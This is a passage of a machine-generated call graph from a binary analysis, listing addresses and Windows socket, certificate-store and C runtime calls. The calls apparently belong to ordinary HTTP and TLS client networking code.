7ff7f1dc6ef8 24 API calls 33210->33211 33212 7ff7f1dc27b1 33211->33212 33212->33230 34277 7ff7f1dcbf1c 23 API calls 33212->34277 33214 7ff7f1dc27cd 33215 7ff7f1dc27da 33214->33215 33222 7ff7f1dc2852 33214->33222 33214->33230 33218 7ff7f1db29ec 10 API calls 33215->33218 33216->33210 33219 7ff7f1db1f00 21 API calls 33216->33219 33217 7ff7f1dc28b1 33221 7ff7f1dc6ef8 24 API calls 33217->33221 33226 7ff7f1dc27e8 33218->33226 33219->33210 33220 7ff7f1dc2890 33220->33217 33224 7ff7f1dc28a0 33220->33224 33221->33230 33222->33217 33222->33220 33223 7ff7f1dc2877 33222->33223 34280 7ff7f1db1fa0 21 API calls __swprintf_l 33223->34280 34281 7ff7f1db1fa0 21 API calls __swprintf_l 33224->34281 33228 7ff7f1dc2821 33226->33228 33229 7ff7f1dc2838 33226->33229 33226->33230 34278 7ff7f1db1fa0 21 API calls __swprintf_l 33228->34278 34279 7ff7f1db1fa0 21 API calls __swprintf_l 33229->34279 33230->33063 33234 7ff7f1dc8532 33233->33234 33235 7ff7f1dc03c8 207 API calls 33234->33235 33236 7ff7f1dc8540 33235->33236 33238 7ff7f1dc8583 33236->33238 33240 7ff7f1dc85a2 33236->33240 34329 7ff7f1dc85d0 46 API calls __swprintf_l 33236->34329 33239 7ff7f1dc8690 158 API calls 33238->33239 33238->33240 33239->33240 33240->33063 33241->33062 33242->33063 33243->33062 33244->33063 33245->33063 33246->33063 33249 7ff7f1dbce9a 33247->33249 33248 7ff7f1dbcecf 33259 7ff7f1db1fa0 21 API calls __swprintf_l 33248->33259 33249->33248 33250 7ff7f1dbced8 33249->33250 33252 7ff7f1dbcf0f 33249->33252 33256 7ff7f1ddeec0 33250->33256 33252->33063 33254 7ff7f1dc6668 2 API calls 33254->33252 33260 7ff7f1dde490 33256->33260 33259->33252 33261 7ff7f1dde4e0 33260->33261 33272 7ff7f1dbcf09 33260->33272 33275 7ff7f1dde50a 33261->33275 33278 7ff7f1db29ec 33261->33278 33262 7ff7f1dde601 33265 7ff7f1dde606 33262->33265 33262->33272 33264 7ff7f1db29ec 10 API calls 33264->33275 33390 7ff7f1dde074 27 API calls __swprintf_l 33265->33390 33268 7ff7f1dde5b8 33268->33272 33389 7ff7f1db1fa0 21 API calls __swprintf_l 33268->33389 33270 7ff7f1dde614 33270->33272 33272->33252 33272->33254 33275->33262 33275->33264 33275->33268 33275->33272 33276 7ff7f1dde5c9 WSAGetLastError 33275->33276 33336 7ff7f1dc6138 33275->33336 33346 7ff7f1ddda28 33275->33346 33388 7ff7f1db1fa0 21 API calls __swprintf_l 33276->33388 33279 7ff7f1db2a37 33278->33279 33281 7ff7f1dcbdf4 __swprintf_l 2 API calls 33279->33281 33283 7ff7f1db2a4e 33279->33283 33280 7ff7f1deaf80 __swprintf_l 8 API calls 33282 7ff7f1db2b00 33280->33282 33281->33283 33282->33268 33284 7ff7f1ddd3f8 33282->33284 33283->33280 33285 7ff7f1ddd455 33284->33285 33286 7ff7f1da3968 16 API calls 33285->33286 33287 7ff7f1ddd496 33286->33287 33288 7ff7f1ddd4a9 33287->33288 33289 7ff7f1db1f00 21 API calls 33287->33289 33290 7ff7f1ddd4b2 GetModuleHandleA GetProcAddress 33288->33290 33294 7ff7f1ddd4ef 33288->33294 33289->33288 33291 7ff7f1ddd4d4 33290->33291 33290->33294 33292 7ff7f1da3968 16 API calls 33291->33292 33293 7ff7f1ddd4e7 33292->33293 33293->33294 33295 7ff7f1da3968 16 API calls 33294->33295 33297 7ff7f1ddd579 33294->33297 33296 7ff7f1ddd571 33295->33296 33296->33297 33298 7ff7f1ddd9e9 33296->33298 33303 7ff7f1ddd70a inet_pton 33297->33303 33391 7ff7f1ddcb60 33297->33391 33486 7ff7f1db1fa0 21 API calls __swprintf_l 33298->33486 33301 7ff7f1deaf80 __swprintf_l 8 API calls 33302 7ff7f1ddda0c 33301->33302 33302->33275 33304 7ff7f1ddd722 inet_pton 33303->33304 33305 7ff7f1ddd739 33303->33305 33304->33305 33307 7ff7f1ddd74d 33304->33307 33310 7ff7f1db1f00 21 API calls 33305->33310 33306 7ff7f1ddd9d3 33485 7ff7f1db1fa0 21 API calls __swprintf_l 33306->33485 33312 7ff7f1db1f00 21 API calls 33307->33312 33315 7ff7f1ddd77e calloc 33307->33315 33309 7ff7f1ddd65d 33309->33306 33311 7ff7f1ddd700 33309->33311 33313 7ff7f1ddd6ea _strdup 33309->33313 33310->33307 33311->33301 33312->33315 33313->33303 33313->33311 33316 7ff7f1ddd840 33315->33316 33321 7ff7f1ddd85b 33316->33321 33477 7ff7f1db1fa0 21 API calls __swprintf_l 33316->33477 33318 7ff7f1ddd950 33319 7ff7f1db22b4 43 API calls 33318->33319 33320 7ff7f1ddd97a 33319->33320 33320->33311 33484 7ff7f1db1fa0 21 API calls __swprintf_l 33320->33484 33321->33318 33322 7ff7f1ddd8f1 33321->33322 33323 7ff7f1ddd939 33321->33323 33325 7ff7f1ddd918 33322->33325 33326 7ff7f1ddd8fa 33322->33326 33482 7ff7f1daeb80 24 API calls __swprintf_l 33323->33482 33480 7ff7f1daeb80 24 API calls __swprintf_l 33325->33480 33478 7ff7f1daeb80 24 API calls __swprintf_l 33326->33478 33328 7ff7f1ddd93e 33483 7ff7f1db1fa0 21 API calls __swprintf_l 33328->33483 33330 7ff7f1ddd901 33479 7ff7f1db1fa0 21 API calls __swprintf_l 33330->33479 33331 7ff7f1ddd91d 33481 7ff7f1db1fa0 21 API calls __swprintf_l 33331->33481 33337 7ff7f1dc616a 33336->33337 33340 7ff7f1dc6181 33336->33340 33338 7ff7f1dc6174 33337->33338 33337->33340 33506 7ff7f1dc60f8 WSASetLastError Sleep 33338->33506 33342 7ff7f1dc62a8 15 API calls 33340->33342 33341 7ff7f1dc617c 33344 7ff7f1dc61dc 33341->33344 33342->33344 33343 7ff7f1deaf80 __swprintf_l 8 API calls 33345 7ff7f1dc6292 33343->33345 33344->33343 33345->33275 33349 7ff7f1ddda9e 33346->33349 33379 7ff7f1dddb4f 33346->33379 33347 7ff7f1deaf80 __swprintf_l 8 API calls 33348 7ff7f1ddddd4 33347->33348 33348->33275 33350 7ff7f1dddb59 33349->33350 33351 7ff7f1dddf76 33349->33351 33353 7ff7f1dddb40 33349->33353 33349->33379 33356 7ff7f1dddb8c __swprintf_l 33350->33356 33507 7ff7f1db2738 recv 33350->33507 33510 7ff7f1db1fa0 21 API calls __swprintf_l 33353->33510 33356->33351 33357 7ff7f1ddde1f 33356->33357 33360 7ff7f1dddce1 33356->33360 33356->33379 33380 7ff7f1dddda9 33356->33380 33358 7ff7f1ddde2c 33357->33358 33359 7ff7f1ddde8b 33357->33359 33361 7ff7f1ddde35 33358->33361 33362 7ff7f1ddde6a 33358->33362 33517 7ff7f1daeb80 24 API calls __swprintf_l 33359->33517 33368 7ff7f1db22b4 43 API calls 33360->33368 33374 7ff7f1dddea2 33360->33374 33376 7ff7f1dddd5f __swprintf_l 33360->33376 33365 7ff7f1ddde5c 33361->33365 33366 7ff7f1ddde3e 33361->33366 33515 7ff7f1daeb80 24 API calls __swprintf_l 33362->33515 33514 7ff7f1daeb80 24 API calls __swprintf_l 33365->33514 33512 7ff7f1daeb80 24 API calls __swprintf_l 33366->33512 33367 7ff7f1ddde90 33518 7ff7f1db1fa0 21 API calls __swprintf_l 33367->33518 33368->33360 33369 7ff7f1ddde61 33516 7ff7f1db1fa0 21 API calls __swprintf_l 33369->33516 33373 7ff7f1ddde45 33513 7ff7f1db1fa0 21 API calls __swprintf_l 33373->33513 33519 7ff7f1db1fa0 21 API calls __swprintf_l 33374->33519 33376->33380 33381 7ff7f1dddec6 33376->33381 33379->33347 33511 7ff7f1db1fa0 21 API calls __swprintf_l 33380->33511 33381->33379 33382 7ff7f1dddf4c 33381->33382 33520 7ff7f1ddf388 38 API calls __swprintf_l 33381->33520 33382->33379 33522 7ff7f1de971c 76 API calls __swprintf_l 33382->33522 33384 7ff7f1dddf30 33384->33382 33386 7ff7f1dddf36 33384->33386 33521 7ff7f1db1fa0 21 API calls __swprintf_l 33386->33521 33388->33272 33389->33272 33390->33270 33392 7ff7f1ddcbc1 33391->33392 33393 7ff7f1db1f00 21 API calls 33392->33393 33396 7ff7f1ddccc4 33393->33396 33394 7ff7f1ddcd23 33487 7ff7f1ddc1c4 33394->33487 33396->33394 33397 7ff7f1ddcd0a 33396->33397 33398 7ff7f1ddccdd 33396->33398 33492 7ff7f1db1fa0 21 API calls __swprintf_l 33397->33492 33398->33394 33404 7ff7f1ddccf1 33398->33404 33400 7ff7f1deaf80 __swprintf_l 8 API calls 33401 7ff7f1ddd330 33400->33401 33401->33309 33402 7ff7f1ddcdbf 33405 7ff7f1ddd2e0 calloc 33402->33405 33406 7ff7f1ddce22 _strdup 33402->33406 33418 7ff7f1ddce0e 33402->33418 33491 7ff7f1db1fa0 21 API calls __swprintf_l 33404->33491 33410 7ff7f1ddd2f5 33405->33410 33408 7ff7f1ddce33 33406->33408 33474 7ff7f1ddcd00 33406->33474 33495 7ff7f1ddc9ac 10 API calls 33408->33495 33415 7ff7f1ddd34b 33410->33415 33416 7ff7f1ddd2fd 33410->33416 33412 7ff7f1ddced1 33414 7ff7f1ddcedf 33412->33414 33420 7ff7f1ddd193 CertOpenStore 33412->33420 33413 7ff7f1ddcda3 33413->33402 33419 7ff7f1ddcda9 33413->33419 33425 7ff7f1ddcefe free 33414->33425 33426 7ff7f1ddcf09 33414->33426 33430 7ff7f1ddd3a2 CertFreeCertificateContext 33415->33430 33431 7ff7f1ddd3a8 33415->33431 33503 7ff7f1db1fa0 21 API calls __swprintf_l 33416->33503 33417 7ff7f1ddce4a 33417->33420 33427 7ff7f1ddce64 fopen 33417->33427 33428 7ff7f1ddd16d 33417->33428 33418->33412 33429 7ff7f1ddcea7 33418->33429 33494 7ff7f1db1fa0 21 API calls __swprintf_l 33419->33494 33432 7ff7f1ddd1c5 GetLastError 33420->33432 33433 7ff7f1ddd20b CryptStringToBinaryA 33420->33433 33424 7ff7f1ddd30c 33434 7ff7f1ddd316 CertFreeCertificateContext 33424->33434 33424->33474 33425->33426 33436 7ff7f1ddcf12 fseek 33426->33436 33456 7ff7f1ddd00a 33426->33456 33427->33428 33435 7ff7f1ddce7f 33427->33435 33501 7ff7f1db1fa0 21 API calls __swprintf_l 33428->33501 33496 7ff7f1db1fa0 21 API calls __swprintf_l 33429->33496 33430->33431 33431->33474 33504 7ff7f1daeb80 24 API calls __swprintf_l 33431->33504 33502 7ff7f1db1fa0 21 API calls __swprintf_l 33432->33502 33449 7ff7f1ddd276 CertFindCertificateInStore 33433->33449 33450 7ff7f1ddd25f 33433->33450 33434->33474 33435->33418 33441 7ff7f1ddcfb5 33436->33441 33442 7ff7f1ddcf32 ftell 33436->33442 33438 7ff7f1ddd183 free 33438->33474 33445 7ff7f1ddcfc2 fseek 33441->33445 33448 7ff7f1ddcf42 33441->33448 33442->33441 33442->33448 33443 7ff7f1ddcecc 33458 7ff7f1ddd1fd free 33443->33458 33443->33474 33445->33448 33447 7ff7f1ddd3ba 33505 7ff7f1db1fa0 21 API calls __swprintf_l 33447->33505 33453 7ff7f1ddcf54 fread 33448->33453 33454 7ff7f1ddcf6e 33448->33454 33451 7ff7f1ddd2a4 free 33449->33451 33452 7ff7f1ddd2b2 33449->33452 33459 7ff7f1ddd15d CertCloseStore 33450->33459 33460 7ff7f1ddd268 free 33450->33460 33451->33452 33452->33459 33461 7ff7f1ddd2bb CertCloseStore 33452->33461 33453->33454 33462 7ff7f1ddcf71 fclose 33453->33462 33454->33462 33455 7ff7f1ddd0b3 33466 7ff7f1ddd116 CertFindCertificateInStore 33455->33466 33467 7ff7f1ddd0d0 GetLastError 33455->33467 33456->33455 33463 7ff7f1ddd060 MultiByteToWideChar 33456->33463 33464 7ff7f1ddd08c PFXImportCertStore 33456->33464 33458->33474 33459->33428 33460->33459 33461->33405 33462->33456 33465 7ff7f1ddcf85 33462->33465 33463->33464 33464->33455 33497 7ff7f1db1fa0 21 API calls __swprintf_l 33465->33497 33466->33461 33471 7ff7f1ddd142 GetLastError 33466->33471 33468 7ff7f1ddd102 33467->33468 33469 7ff7f1ddd0e1 33467->33469 33499 7ff7f1db1fa0 21 API calls __swprintf_l 33468->33499 33498 7ff7f1db1fa0 21 API calls __swprintf_l 33469->33498 33500 7ff7f1db1fa0 21 API calls __swprintf_l 33471->33500 33474->33400 33477->33321 33478->33330 33479->33311 33480->33331 33481->33311 33482->33328 33483->33318 33484->33311 33485->33311 33486->33311 33489 7ff7f1ddc1e5 33487->33489 33488 7ff7f1ddc26e 33488->33402 33488->33474 33493 7ff7f1ddc8c4 strtol strncmp strncmp 33488->33493 33489->33488 33490 7ff7f1db1fa0 21 API calls 33489->33490 33490->33488 33491->33474 33492->33474 33493->33413 33494->33474 33495->33417 33496->33443 33497->33474 33498->33474 33499->33474 33500->33459 33501->33438 33502->33443 33503->33424 33504->33447 33505->33474 33506->33341 33508 7ff7f1db2771 33507->33508 33509 7ff7f1db2753 WSAGetLastError 33507->33509 33508->33356 33509->33508 33510->33379 33511->33379 33512->33373 33513->33379 33514->33369 33515->33369 33516->33379 33517->33367 33518->33374 33519->33379 33520->33384 33521->33379 33522->33379 33524 7ff7f1dc03ef 33523->33524 33525 7ff7f1dc0410 33523->33525 33524->33525 33526 7ff7f1dbce6c 158 API calls 33524->33526 33528 7ff7f1dabd13 33525->33528 33529 7ff7f1dc1234 207 API calls 33525->33529 33526->33525 33528->33078 33528->33079 33529->33528 33534 7ff7f1db34a9 33530->33534 33538 7ff7f1db3537 33530->33538 33531 7ff7f1db3568 33556 7ff7f1dc3eec 184 API calls __swprintf_l 33531->33556 33533 7ff7f1db353e 33555 7ff7f1dc455c 194 API calls __swprintf_l 33533->33555 33534->33531 33534->33533 33535 7ff7f1db3523 33534->33535 33535->33533 33537 7ff7f1db3528 33535->33537 33554 7ff7f1db1fa0 21 API calls __swprintf_l 33537->33554 33538->33100 33540 7ff7f1db35a4 33538->33540 33541 7ff7f1db35e0 33540->33541 33542 7ff7f1db35cd 33540->33542 33557 7ff7f1db33d8 33541->33557 33543 7ff7f1dc6668 2 API calls 33542->33543 33543->33541 33547 7ff7f1db35fe 33547->33100 33548->33092 33549->33092 33550->33100 33551->33111 33552->33113 33553->33100 33554->33538 33555->33538 33556->33538 33558 7ff7f1db345a 33557->33558 33560 7ff7f1db3430 33557->33560 33562 7ff7f1deaf80 __swprintf_l 8 API calls 33558->33562 33559 7ff7f1db3445 33566 7ff7f1db32f4 33559->33566 33560->33559 33581 7ff7f1db320c 40 API calls __swprintf_l 33560->33581 33564 7ff7f1db347c 33562->33564 33565 7ff7f1db82f0 21 API calls 33564->33565 33565->33547 33582 7ff7f1dec350 33566->33582 33569 7ff7f1db336f 33585 7ff7f1db315c 33569->33585 33570 7ff7f1db334c WSAGetLastError 33584 7ff7f1dae9c8 27 API calls __swprintf_l 33570->33584 33573 7ff7f1db3363 33595 7ff7f1db1fa0 21 API calls __swprintf_l 33573->33595 33575 7ff7f1db3387 _errno _errno 33594 7ff7f1dae9c8 27 API calls __swprintf_l 33575->33594 33576 7ff7f1db33bc 33579 7ff7f1deaf80 __swprintf_l 8 API calls 33576->33579 33580 7ff7f1db33cc 33579->33580 33580->33558 33581->33559 33583 7ff7f1db3335 getsockname 33582->33583 33583->33569 33583->33570 33584->33573 33586 7ff7f1db31d4 33585->33586 33587 7ff7f1db317e 33585->33587 33589 7ff7f1da4fc8 __swprintf_l 15 API calls 33586->33589 33591 7ff7f1db31f1 33586->33591 33588 7ff7f1db31be _errno 33587->33588 33596 7ff7f1dc037c _errno 33587->33596 33588->33591 33589->33591 33591->33575 33591->33576 33592 7ff7f1db319d 33592->33588 33593 7ff7f1db31a2 htons 33592->33593 33593->33591 33594->33573 33595->33576 33596->33592 33608 7ff7f1dc514c 33597->33608 33599 7ff7f1dc5231 33600 7ff7f1dc5282 33599->33600 33601 7ff7f1dc52f7 33599->33601 33604 7ff7f1dc514c tolower 33599->33604 33600->33601 33602 7ff7f1dc52bd _time64 33600->33602 33603 7ff7f1deaf80 __swprintf_l 8 API calls 33601->33603 33602->33601 33605 7ff7f1dc52da 33602->33605 33606 7ff7f1dc5320 33603->33606 33604->33600 33605->33601 33607 7ff7f1db1f00 21 API calls 33605->33607 33606->33120 33607->33601 33609 7ff7f1dc516c 33608->33609 33609->33609 33610 7ff7f1dc519f 33609->33610 33611 7ff7f1dc518a tolower 33609->33611 33611->33610 33611->33611 33613 7ff7f1db29ec 10 API calls 33612->33613 33614 7ff7f1db3f4c 33613->33614 33615 7ff7f1db3f54 33614->33615 33616 7ff7f1db3f6b 33614->33616 33673 7ff7f1db1fa0 21 API calls __swprintf_l 33615->33673 33618 7ff7f1db406a 33616->33618 33623 7ff7f1db3ba4 33616->33623 33620 7ff7f1db3f63 33618->33620 33674 7ff7f1dad9d0 23 API calls __swprintf_l 33618->33674 33620->33141 33622->33141 33675 7ff7f1db4260 33623->33675 33626 7ff7f1db3d91 33628 7ff7f1deaf80 __swprintf_l 8 API calls 33626->33628 33666 7ff7f1db3e82 33626->33666 33627 7ff7f1db315c 18 API calls 33629 7ff7f1db3c1b 33627->33629 33630 7ff7f1db3f08 33628->33630 33631 7ff7f1db3c24 _errno _errno 33629->33631 33632 7ff7f1db3c5a 33629->33632 33630->33616 33700 7ff7f1dae9c8 27 API calls __swprintf_l 33631->33700 33633 7ff7f1db1f00 21 API calls 33632->33633 33635 7ff7f1db3c72 33633->33635 33638 7ff7f1db3ce3 33635->33638 33640 7ff7f1db3c97 setsockopt 33635->33640 33636 7ff7f1db3c40 33701 7ff7f1db1fa0 21 API calls __swprintf_l 33636->33701 33683 7ff7f1db3af0 33638->33683 33639 7ff7f1db3c55 33641 7ff7f1db4190 closesocket 33639->33641 33640->33638 33642 7ff7f1db3cbd WSAGetLastError 33640->33642 33641->33626 33702 7ff7f1dae9c8 27 API calls __swprintf_l 33642->33702 33646 7ff7f1db3cd1 33648 7ff7f1db1f00 21 API calls 33646->33648 33647 7ff7f1db3d75 33650 7ff7f1db3dac 33647->33650 33652 7ff7f1db3ddd ioctlsocket 33647->33652 33648->33638 33703 7ff7f1db2b14 196 API calls __swprintf_l 33650->33703 33651 7ff7f1db3d09 33651->33639 33651->33647 33655 7ff7f1dcbdf4 __swprintf_l 2 API calls 33652->33655 33654 7ff7f1db3db7 33654->33652 33656 7ff7f1db3dbd 33654->33656 33657 7ff7f1db3e02 33655->33657 33658 7ff7f1db4190 closesocket 33656->33658 33659 7ff7f1db3e42 33657->33659 33704 7ff7f1dad9d0 23 API calls __swprintf_l 33657->33704 33661 7ff7f1db3dcb 33658->33661 33659->33626 33664 7ff7f1db3e62 connect 33659->33664 33665 7ff7f1db3e84 WSAGetLastError 33659->33665 33661->33626 33662 7ff7f1db3e2d 33705 7ff7f1dad9d0 23 API calls __swprintf_l 33662->33705 33664->33626 33664->33665 33665->33666 33667 7ff7f1db3e93 33665->33667 33666->33616 33667->33666 33706 7ff7f1dae9c8 27 API calls __swprintf_l 33667->33706 33669 7ff7f1db3eab 33670 7ff7f1db1f00 21 API calls 33669->33670 33671 7ff7f1db3ec1 33670->33671 33672 7ff7f1db4190 closesocket 33671->33672 33672->33666 33673->33620 33674->33620 33676 7ff7f1db42b8 __swprintf_l 33675->33676 33677 7ff7f1db434a socket 33676->33677 33678 7ff7f1db42ee 33676->33678 33677->33678 33679 7ff7f1db4362 33678->33679 33680 7ff7f1db4372 ioctlsocket 33678->33680 33681 7ff7f1deaf80 __swprintf_l 8 API calls 33679->33681 33680->33679 33682 7ff7f1db3bfa 33681->33682 33682->33626 33682->33627 33684 7ff7f1db3b2a 33683->33684 33685 7ff7f1db3b18 33683->33685 33686 7ff7f1db3b4a getsockopt 33684->33686 33687 7ff7f1db3b2e 33684->33687 33688 7ff7f1da3968 16 API calls 33685->33688 33689 7ff7f1db3b71 33686->33689 33690 7ff7f1db3b7b setsockopt 33686->33690 33687->33651 33691 7ff7f1db28e0 setsockopt 33687->33691 33688->33684 33689->33687 33689->33690 33690->33687 33692 7ff7f1db2933 33691->33692 33693 7ff7f1db294a WSAIoctl 33691->33693 33694 7ff7f1db1f00 21 API calls 33692->33694 33695 7ff7f1db2945 33693->33695 33696 7ff7f1db29b6 WSAGetLastError 33693->33696 33694->33695 33698 7ff7f1deaf80 __swprintf_l 8 API calls 33695->33698 33697 7ff7f1db1f00 21 API calls 33696->33697 33697->33695 33699 7ff7f1db29de 33698->33699 33699->33651 33700->33636 33701->33639 33702->33646 33703->33654 33704->33662 33705->33659 33706->33669 33708 7ff7f1dbae10 33707->33708 33750 7ff7f1dbae36 33708->33750 33781 7ff7f1db839c calloc 33708->33781 33710 7ff7f1deaf80 __swprintf_l 8 API calls 33712 7ff7f1dbb5d8 33710->33712 33712->33155 33712->33157 33712->33158 33714 7ff7f1dbae68 33714->33750 33844 7ff7f1db97c0 33714->33844 33717 7ff7f1dbaf72 33717->33750 33866 7ff7f1db9dbc 33717->33866 33719 7ff7f1da4fc8 __swprintf_l 15 API calls 33720 7ff7f1dbaf5b 33719->33720 33939 7ff7f1daa254 46 API calls __swprintf_l 33720->33939 33722 7ff7f1dbaf85 33722->33750 33891 7ff7f1dba4c8 33722->33891 33727 7ff7f1dbaff0 33729 7ff7f1dbb012 33727->33729 33730 7ff7f1db8364 21 API calls 33727->33730 33727->33750 33728 7ff7f1db8364 21 API calls 33728->33727 33731 7ff7f1db8364 21 API calls 33729->33731 33732 7ff7f1dbb034 33729->33732 33729->33750 33730->33729 33731->33732 33734 7ff7f1dbb1df 33732->33734 33737 7ff7f1dbb139 33732->33737 33732->33750 33733 7ff7f1dbb1cf 33735 7ff7f1dbb90c 2 API calls 33733->33735 33734->33750 33902 7ff7f1db7768 33734->33902 33735->33750 33737->33733 33940 7ff7f1dbf4d0 15 API calls __swprintf_l 33737->33940 33738 7ff7f1dbb415 33741 7ff7f1dbb4f7 33738->33741 33942 7ff7f1db7888 62 API calls 33738->33942 33740 7ff7f1dbb186 33742 7ff7f1db8eb4 15 API calls 33740->33742 33740->33750 33746 7ff7f1dbb5a9 33741->33746 33944 7ff7f1dbf448 15 API calls __swprintf_l 33741->33944 33744 7ff7f1dbb198 33742->33744 33744->33750 33941 7ff7f1dc3300 23 API calls __swprintf_l 33744->33941 33745 7ff7f1dbb454 33745->33741 33748 7ff7f1dbb45c 33745->33748 33747 7ff7f1db1f00 21 API calls 33746->33747 33747->33750 33943 7ff7f1dba9cc 40 API calls __swprintf_l 33748->33943 33750->33710 33753 7ff7f1dbb542 33756 7ff7f1dbb596 33753->33756 33945 7ff7f1dbf920 QueryPerformanceCounter GetTickCount __swprintf_l 33753->33945 33754 7ff7f1dbb637 33947 7ff7f1dbf4d0 15 API calls __swprintf_l 33754->33947 33756->33754 33946 7ff7f1dbf9d0 QueryPerformanceCounter GetTickCount __swprintf_l 33756->33946 33757 7ff7f1dbb569 33760 7ff7f1dbb59a 33757->33760 33761 7ff7f1dbb58b 33757->33761 33758 7ff7f1dbb46b 33764 7ff7f1db1f00 21 API calls 33758->33764 33766 7ff7f1db1f00 21 API calls 33760->33766 33765 7ff7f1db73b8 60 API calls 33761->33765 33763 7ff7f1dbb620 33767 7ff7f1dbb703 33763->33767 33768 7ff7f1dbb62c 33763->33768 33769 7ff7f1dbb4f2 33764->33769 33765->33756 33766->33746 33773 7ff7f1db1f00 21 API calls 33767->33773 33771 7ff7f1db73b8 60 API calls 33768->33771 33907 7ff7f1dbb90c 33769->33907 33770 7ff7f1dbb678 33770->33769 33776 7ff7f1db1f00 21 API calls 33770->33776 33771->33754 33772 7ff7f1dbb64a 33772->33750 33772->33770 33775 7ff7f1db1f00 21 API calls 33772->33775 33773->33746 33775->33770 33776->33769 33782 7ff7f1db83ca 33781->33782 33783 7ff7f1db83d4 33782->33783 33784 7ff7f1db83db calloc 33782->33784 33783->33750 33792 7ff7f1db88d8 33783->33792 33785 7ff7f1db8400 33784->33785 33786 7ff7f1dcbdf4 __swprintf_l 2 API calls 33785->33786 33790 7ff7f1db8405 33785->33790 33787 7ff7f1db849f 33786->33787 33788 7ff7f1dcbdf4 __swprintf_l 2 API calls 33787->33788 33791 7ff7f1db84b4 33788->33791 33789 7ff7f1dcbdf4 __swprintf_l 2 API calls 33789->33790 33790->33783 33791->33789 33793 7ff7f1db890c 33792->33793 33794 7ff7f1db8925 33793->33794 33795 7ff7f1db8933 calloc 33793->33795 33948 7ff7f1da99dc calloc 33794->33948 33798 7ff7f1db8948 33795->33798 33797 7ff7f1db8931 33797->33798 33807 7ff7f1db8990 33798->33807 33842 7ff7f1db8a0b 33798->33842 33949 7ff7f1da8590 tolower 33798->33949 33800 7ff7f1db8972 33800->33807 33950 7ff7f1da50b0 15 API calls _scwprintf 33800->33950 33803 7ff7f1db8a75 33803->33842 33954 7ff7f1da9b60 16 API calls 2 library calls 33803->33954 33804 7ff7f1db8a07 33804->33842 33952 7ff7f1da9b60 16 API calls 2 library calls 33804->33952 33809 7ff7f1db8a29 33807->33809 33807->33842 33951 7ff7f1daa254 46 API calls __swprintf_l 33807->33951 33809->33842 33953 7ff7f1da9b60 16 API calls 2 library calls 33809->33953 33810 7ff7f1db8a91 33811 7ff7f1db8bad 33810->33811 33810->33842 33955 7ff7f1dbbde0 13 API calls __swprintf_l 33810->33955 33812 7ff7f1db8e99 33811->33812 33815 7ff7f1db8be8 33811->33815 33968 7ff7f1db1fa0 21 API calls __swprintf_l 33812->33968 33826 7ff7f1db8c51 33815->33826 33959 7ff7f1da9b60 16 API calls 2 library calls 33815->33959 33816 7ff7f1db8ae2 33816->33811 33956 7ff7f1daa254 46 API calls __swprintf_l 33816->33956 33820 7ff7f1db8c1b 33820->33826 33960 7ff7f1da5988 strtoul 33820->33960 33821 7ff7f1db8d3a 33821->33842 33964 7ff7f1da9b60 16 API calls 2 library calls 33821->33964 33822 7ff7f1db8cb0 33829 7ff7f1db8ce7 33822->33829 33962 7ff7f1da5988 strtoul 33822->33962 33826->33829 33826->33842 33961 7ff7f1da9b60 16 API calls 2 library calls 33826->33961 33829->33842 33963 7ff7f1da9b60 16 API calls 2 library calls 33829->33963 33830 7ff7f1db8d9b 33830->33842 33965 7ff7f1da9b60 16 API calls 2 library calls 33830->33965 33831 7ff7f1db8b13 33831->33842 33957 7ff7f1da9b60 16 API calls 2 library calls 33831->33957 33832 7ff7f1db8b51 33832->33842 33958 7ff7f1da9b60 16 API calls 2 library calls 33832->33958 33835 7ff7f1db8dbc 33837 7ff7f1db8dc0 33835->33837 33838 7ff7f1db8dd5 strtoul 33835->33838 33836 7ff7f1db8b6a 33839 7ff7f1db1f00 21 API calls 33836->33839 33836->33842 33837->33842 33966 7ff7f1da9b60 16 API calls 2 library calls 33837->33966 33838->33837 33839->33811 33841 7ff7f1db8e1c 33841->33841 33841->33842 33967 7ff7f1db87ec 36 API calls __swprintf_l 33841->33967 33842->33714 33845 7ff7f1db97fa 33844->33845 33849 7ff7f1db97ff 33844->33849 33969 7ff7f1db96f0 strtoul 33845->33969 33847 7ff7f1db9866 33850 7ff7f1da5718 GetEnvironmentVariableA 33847->33850 33853 7ff7f1db98b2 33847->33853 33848 7ff7f1db982b 33970 7ff7f1db1fa0 21 API calls __swprintf_l 33848->33970 33849->33847 33849->33848 33865 7ff7f1db983a 33849->33865 33852 7ff7f1db987e 33850->33852 33854 7ff7f1db9895 33852->33854 33856 7ff7f1da5718 GetEnvironmentVariableA 33852->33856 33858 7ff7f1db98d3 33853->33858 33971 7ff7f1db9118 23 API calls __swprintf_l 33853->33971 33854->33853 33855 7ff7f1db1f00 21 API calls 33854->33855 33855->33853 33856->33854 33859 7ff7f1db99a1 33858->33859 33860 7ff7f1db998f 33858->33860 33972 7ff7f1db9260 64 API calls 33859->33972 33862 7ff7f1db99b6 33860->33862 33860->33865 33862->33865 33973 7ff7f1db9260 64 API calls 33862->33973 33864 7ff7f1db99ef 33864->33865 33865->33717 33865->33719 33865->33750 33867 7ff7f1db9def 33866->33867 33868 7ff7f1db9ee5 33867->33868 33869 7ff7f1db9ffb 33867->33869 33875 7ff7f1dba02f 33867->33875 33882 7ff7f1db9fe6 33867->33882 33870 7ff7f1da5718 GetEnvironmentVariableA 33868->33870 33978 7ff7f1dd0804 11 API calls __swprintf_l 33869->33978 33873 7ff7f1db9ef1 33870->33873 33876 7ff7f1dba133 33873->33876 33974 7ff7f1da50b0 15 API calls _scwprintf 33873->33974 33875->33875 33877 7ff7f1dba047 33875->33877 33875->33882 33980 7ff7f1daa254 46 API calls __swprintf_l 33875->33980 33881 7ff7f1db1f00 21 API calls 33876->33881 33877->33877 33877->33882 33979 7ff7f1daa254 46 API calls __swprintf_l 33877->33979 33880 7ff7f1db9f13 33880->33882 33883 7ff7f1db9f24 33880->33883 33884 7ff7f1dba152 33881->33884 33882->33722 33975 7ff7f1dd0804 11 API calls __swprintf_l 33883->33975 33884->33722 33886 7ff7f1db9f4c 33887 7ff7f1db9fba 33886->33887 33976 7ff7f1da50b0 15 API calls _scwprintf 33886->33976 33887->33875 33887->33876 33889 7ff7f1db9f80 33889->33882 33977 7ff7f1dd0804 11 API calls __swprintf_l 33889->33977 33897 7ff7f1dba4f2 33891->33897 33892 7ff7f1dba6da 33892->33750 33898 7ff7f1db8364 33892->33898 33895 7ff7f1dba5e6 strtol 33895->33897 33896 7ff7f1db1f00 21 API calls 33896->33897 33897->33892 33897->33895 33897->33896 33981 7ff7f1da50b0 15 API calls _scwprintf 33897->33981 33982 7ff7f1dba2d0 23 API calls 33897->33982 33899 7ff7f1db8384 33898->33899 33900 7ff7f1db8375 33898->33900 33899->33727 